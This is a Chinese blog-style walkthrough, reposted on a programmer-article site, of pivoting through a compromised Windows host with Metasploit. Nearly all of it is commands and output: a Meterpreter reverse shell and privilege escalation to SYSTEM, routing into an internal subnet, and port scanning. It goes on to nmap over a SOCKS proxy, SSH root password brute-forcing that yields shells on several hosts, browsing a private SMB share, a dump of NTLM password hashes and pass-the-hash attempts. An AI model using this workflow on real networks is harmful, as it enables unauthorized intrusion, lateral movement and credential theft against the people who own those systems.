欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

Metasploit跨路由器访问

程序员文章站 2022-03-05 15:47:00
首先得获得一个内网的SHELL 转移到SYSTEM权限 msf  exploit(handler) > exploit [*] Started reverse handle...

首先得获得一个内网的SHELL 转移到SYSTEM权限

msf  exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.103:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.100:51898) at 2012-11-04 20:49:37 +0800

meterpreter > getuid
Server username: BRK-FC17123537C\Administrator
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
接着查看网段

meterpreter > ifconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - ���ݰ��ƻ�����΢�Ͷ˿�
Hardware MAC : 00:50:56:28:2c:de
MTU          : 1500
IPv4 Address : 5.5.5.9
IPv4 Netmask : 255.255.255.0

Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - pencS��R
                                                                z�_�W�z�S
Hardware MAC : 00:50:56:28:2c:de
MTU          : 1500
IPv4 Address : 5.5.5.9
IPv4 Netmask : 255.255.255.0

meterpreter >
5.5.5.9 ping测试一下

meterpreter > background
[*] Backgrounding session 1...
msf  exploit(handler) > ping 5.5.5.9
[*] exec: ping 5.5.5.9

^CInterrupt: use the 'exit' command to quit
msf  exploit(handler) >
无反应 接着看下网络信息

msf  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > route

IPv4 network routes
===================

    Subnet           Netmask          Gateway    Metric  Interface
    ------           -------          -------    ------  ---------
    0.0.0.0          0.0.0.0          5.5.5.2    10      2
    5.5.5.0          255.255.255.0    5.5.5.9    10      2
    5.5.5.9          255.255.255.255  127.0.0.1  10      1
    5.255.255.255    255.255.255.255  5.5.5.9    10      2
    127.0.0.0        255.0.0.0        127.0.0.1  1       1
    224.0.0.0        240.0.0.0        5.5.5.9    10      2
    255.255.255.255  255.255.255.255  5.5.5.9    1       2

No IPv6 routes were found.
meterpreter >
查找网络接口:

Metasploit跨路由器访问
Local subnet: 5.5.5.0/255.255.255.0
只有一个 route 试试

meterpreter > background
[*] Backgrounding session 1...
msf  exploit(handler) > route add 5.5.5.0 255.255.255.0 1
[*] Route added
msf  exploit(handler) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   5.5.5.0            255.255.255.0      Session 1

msf  exploit(handler) >
注意 msf exploit(handler) > route add 5.5.5.0 255.255.255.0 1 的 最后一个 1 是sessions的会话ID route 的时候别弄错

来测试扫描一下

msf  exploit(handler) > use auxiliary/scanner/portscan/tcp
msf  auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf  auxiliary(tcp) > set RHOSTS 5.5.5.0-254
RHOSTS => 5.5.5.0-254
msf  auxiliary(tcp) > set PORTS 22,445,135,443,80,1433
PORTS => 22,445,135,443,80,1433
msf  auxiliary(tcp) > exploit

[*] 5.5.5.1:445 - TCP OPEN
[*] 5.5.5.1:135 - TCP OPEN
[*] 5.5.5.1:443 - TCP OPEN
[*] 5.5.5.3:22 - TCP OPEN
[*] 5.5.5.3:80 - TCP OPEN
[*] 5.5.5.4:22 - TCP OPEN
[*] 5.5.5.5:22 - TCP OPEN
[*] 5.5.5.6:80 - TCP OPEN
[*] 5.5.5.6:135 - TCP OPEN
[*] 5.5.5.6:1433 - TCP OPEN
[*] 5.5.5.6:445 - TCP OPEN
-----省略------
查看结果:

msf  auxiliary(tcp) > hosts

Hosts
=====

address        mac  name             os_name            os_flavor  os_sp  purpose   info  comments
-------        ---  ----             -------            ---------  -----  -------   ----  --------
5.5.5.1                              Unknown                              device         
5.5.5.3                              Unknown                              device         
5.5.5.4                              Unknown                              device         
5.5.5.5                              Unknown                              device         
5.5.5.6                              Unknown                              device         
5.5.5.8                              Unknown                              device         
5.5.5.9             BRK-FC17123537C  Microsoft Windows  XP         SP2    client         
5.5.5.10                             Unknown                              device         
5.5.5.11                             Unknown                              device         
192.168.1.100                                                             firewall       

msf  auxiliary(tcp) >
查看服务

msf  auxiliary(tcp) > services

Services
========

host      port  proto  name  state  info
----      ----  -----  ----  -----  ----
5.5.5.1   135   tcp          open  
5.5.5.1   443   tcp          open  
5.5.5.1   445   tcp          open  
5.5.5.3   80    tcp          open  
5.5.5.3   22    tcp          open  
5.5.5.4   22    tcp          open  
5.5.5.5   22    tcp          open  
5.5.5.6   80    tcp          open  
5.5.5.6   135   tcp          open  
5.5.5.6   445   tcp          open  
5.5.5.6   1433  tcp          open  
5.5.5.8   443   tcp          open  
5.5.5.8   80    tcp          open  
5.5.5.8   22    tcp          open  
5.5.5.9   80    tcp          open  
5.5.5.9   135   tcp          open  
5.5.5.9   443   tcp          open  
5.5.5.9   445   tcp          open  
5.5.5.10  445   tcp          open  
5.5.5.10  135   tcp          open  
5.5.5.10  443   tcp          open  
5.5.5.10  80    tcp          open  
5.5.5.11  22    tcp          open  

msf  auxiliary(tcp) >
我们可以根据服务做一些事情 开SSH的比较多 MSF的扫描速度很扯淡 可以开个代理给NMAP扫描 如:

msf > use auxiliary/server/socks4a
msf  auxiliary(socks4a) > show options

Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.

msf  auxiliary(socks4a) > exit
[*] You have active sessions open, to exit anyway type "exit -y"

[*] Starting the socks4a proxy server
msf  auxiliary(socks4a) >
接着就需要神器proxychains 来帮助我们使用代理接口 编辑proxychains 配置文件

brk@Dis9Team:/tmp$ sudo nano /etc/proxychains.conf
修改默认代理如下:

socks4  127.0.0.1 1080
测试

msf  auxiliary(socks4a) > sessions

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  BRK-FC17123537C\Administrator @ BRK-FC17123537C  192.168.1.103:4444 -> 192.168.1.100:51898 (5.5.5.9)

msf  auxiliary(socks4a) >
IP 5.5.5.9 链接他的445端口

brk@Dis9Team:/tmp$ proxychains nc -vv 5.5.5.9 445
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.9:445-<><>-OK
Connection to 5.5.5.9 445 port [tcp/microsoft-ds] succeeded!
成功 开始用NMAP探测

brk@Dis9Team:/tmp$ proxychains nmap -sP 5.5.5.0/24
ProxyChains-3.1 (http://proxychains.sf.net)

Starting Nmap 6.00 ( http://nmap.org ) at 2012-11-04 21:27 CST
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.1:80-<--denied
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.4:80-<--denied
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.7:80-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.10:80-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.11:80-<--denied
扫描一个主机

brk@Dis9Team:/tmp$ sudo proxychains nmap 5.5.5.5 -sV -sT -T5 -O -PN
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:256-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:110-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:3306-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:8080-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:445-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:22-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.5:22-<><>-OK
Nmap scan report for 5.5.5.5
Host is up (0.10s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
No OS matches for host

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds
brk@Dis9Team:/tmp$
开放了SSH 用MSF破解试试

msf  auxiliary(ssh_login) > exploit

[*] 5.5.5.5:22 SSH - Starting bruteforce
[*] 5.5.5.5:22 SSH - [1/4] - Trying: username: 'root' with password: ''
[-] 5.5.5.5:22 SSH - [1/4] - Failed: 'root':''
[*] 5.5.5.5:22 SSH - [2/4] - Trying: username: 'root' with password: 'root'
[-] 5.5.5.5:22 SSH - [2/4] - Failed: 'root':'root'
[*] 5.5.5.5:22 SSH - [3/4] - Trying: username: 'root' with password: '123456'
-----不给你看--------------
[*] Command shell session 2 opened (192.168.1.103-192.168.1.100:0 -> 5.5.5.5:22) at 2012-11-04 21:32:58 +0800
[+] 5.5.5.5:22 SSH - [3/4] - Success: 'root':'不给你看' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh Linux CENTOS 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:35 EDT 2010 i686 i686 i386 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(ssh_login) >
成功破解出了SSH密码
Metasploit跨路由器访问

链接试试

msf  auxiliary(ssh_login) > sessions

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  BRK-FC17123537C\Administrator @ BRK-FC17123537C  192.168.1.103:4444 -> 192.168.1.100:51898 (5.5.5.9)
  2   shell linux            SSH root:不给你看 (5.5.5.5:22)                     192.168.1.103-192.168.1.100:0 -> 5.5.5.5:22 (5.5.5.5)

msf  auxiliary(ssh_login) > sessions -i 2
[*] Starting interaction with 2...

id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh
cat /proc/version
Linux version 2.6.18-194.el5 (mockbuild@builder16.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Fri Apr 2 14:58:35 EDT 2010
lsb_release -a
LSB Version: :core-3.1-ia32:core-3.1-noarch:graphics-3.1-ia32:graphics-3.1-noarch
Distributor ID: CentOS
Description: CentOS release 5.5 (Final)
Release: 5.5
Codename: Final
貌似开SSH的很多 批量扫描吧

Metasploit跨路由器访问
msf  auxiliary(ssh_login) > sessions

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  BRK-FC17123537C\Administrator @ BRK-FC17123537C  192.168.1.103:4444 -> 192.168.1.100:51898 (5.5.5.9)
  3   shell linux            SSH root:123456 (5.5.5.3:22)                     192.168.1.103-192.168.1.100:0 -> 5.5.5.3:22 (5.5.5.3)
  4   shell linux            SSH root:a (5.5.5.8:22)                          192.168.1.103-192.168.1.100:0 -> 5.5.5.8:22 (5.5.5.8)
  5   shell linux            SSH root:123456 (5.5.5.5:22)                     192.168.1.103-192.168.1.100:0 -> 5.5.5.5:22 (5.5.5.5)
  6   shell linux            SSH root:123456 (5.5.5.4:22)                     192.168.1.103-192.168.1.100:0 -> 5.5.5.4:22 (5.5.5.4)
  7   shell linux            SSH root:123456 (5.5.5.11:22)                    192.168.1.103-192.168.1.100:0 -> 5.5.5.11:22 (5.5.5.11)

msf  auxiliary(ssh_login) >
还有几台WINDOWS的呢?

msf  auxiliary(ssh_login) > services -p 445

Services
========

host      port  proto  name  state  info
----      ----  -----  ----  -----  ----
5.5.5.1   445   tcp          open  
5.5.5.6   445   tcp          open  
5.5.5.9   445   tcp          open  
5.5.5.10  445   tcp          open  

msf  auxiliary(ssh_login) >
测试SMB探测

msf  auxiliary(smb_enumshares) > set RHOSTS 5.5.5.1
RHOSTS => 5.5.5.1
msf  auxiliary(smb_enumshares) > run

[*] 5.5.5.1:445 ADMIN$ - ܏
                         z�{t (DISK), C$ - ؞��qQ�N (DISK), D$ - ؞��qQ�N (DISK), E$ - ؞��qQ�N (DISK), F$ - ؞��qQ�N (DISK), ftp -  (DISK), H$ - ؞��qQ�N (DISK), IPC$ - ܏
                       z IPC (IPC)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(smb_enumshares) >
貌似有东西
查看一下:

Metasploit跨路由器访问

不晓得有木有九区狗的名单,有就全部封杀了 恩访问下

brk@Dis9Team:/tmp/123$ proxychains smbclient //5.5.5.1/ftp
ProxyChains-3.1 (http://proxychains.sf.net)
Enter brk's password:
|S-chain|-<>-127.0.0.1:1080-<><>-5.5.5.1:445-<><>-OK
Domain=[DIS91] OS=[Windows 7 Ultimate 7601 Service Pack 1] Server=[Windows 7 Ultimate 6.1]
smb: \> dir
  .                                   D        0  Sun Nov  4 20:11:13 2012
  ..                                  D        0  Sun Nov  4 20:11:13 2012
  1                                   D        0  Mon Oct 29 03:12:49 2012
  1.rar                               A 5554064923  Sat Oct 27 16:35:12 2012
  1.zip                               A 2165820895  Sun Oct  7 10:09:40 2012
  2.iso                               A 728018944  Tue Oct  9 19:58:06 2012
  2.zip                               A 1220728381  Sun Oct 14 00:41:59 2012
  AspSweb.exe                         A   649745  Fri Aug 15 16:45:34 2008
  burpsuite.jar                       A  8198291  Thu Sep 27 03:29:29 2012
  CS1_5_chsV1.0.zip                   A 283779223  Sat Sep 29 15:19:44 2012
  down                                D        0  Sun Sep 23 20:19:12 2012
  ftp.zip                             A 11599105  Sun Sep 30 09:54:53 2012
  HdReport.txt                        A     2479  Thu Sep 27 10:20:01 2012
  kubuntu-12.04.1-desktop-amd64.iso      A 736407552  Sun Sep 16 22:07:52 2012
  My Games.zip                        A  3595119  Wed Oct 10 18:49:53 2012
  TorchlightII_chsV1.11.5.3.zip       A 1609147375  Wed Oct 10 18:48:25 2012
  Ubuntu1.zip                         A 2833754852  Wed Oct 10 11:28:54 2012
  users.dat                           A       74  Sun Oct 14 00:47:32 2012
  VRMPVOL_CNsp2.iso                   A 621346816  Sat Sep 29 10:20:44 2012
  yxdown.com_TorchlightII_chsV1.11.5.3.exe      A 1590876064  Wed Sep 26 05:09:13 2012
  浮生偷换.mp3                    A  6303705  Sat Sep 15 21:21:19 2012
  金粉沉埋.mp3                    A  5532570  Sat Sep 15 22:49:35 2012

  36381 blocks of size 4194304. 14743 blocks available
smb: \>
有水一的歌曲哦
先获得帐号密码

meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:54688ec262626f406dadd35533ff3375:19d7141e4c62b1f5318db46b6d0f1390:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:30f6b88b04ce59ef6e72ad5f4df330ee:::
meterpreter >
可以进行PASS THE HASH攻击

msf  exploit(psexec) > exploit

[*] Started reverse handler on 192.168.1.103:4444
[*] Connecting to the server...
[*] Authenticating to 5.5.5.9:445|WORKGROUP as user ''...
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
^Cmsf  exploit(psexec) > set RHOST 5.5.5.6
RHOST => 5.5.5.6
msf  exploit(psexec) > exploit

[*] Started reverse handler on 192.168.1.103:4444
[*] Connecting to the server...
[*] Authenticating to 5.5.5.6:445|WORKGROUP as user ''...
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
^Cmsf  exploit(psexec) >
失败了 破解密码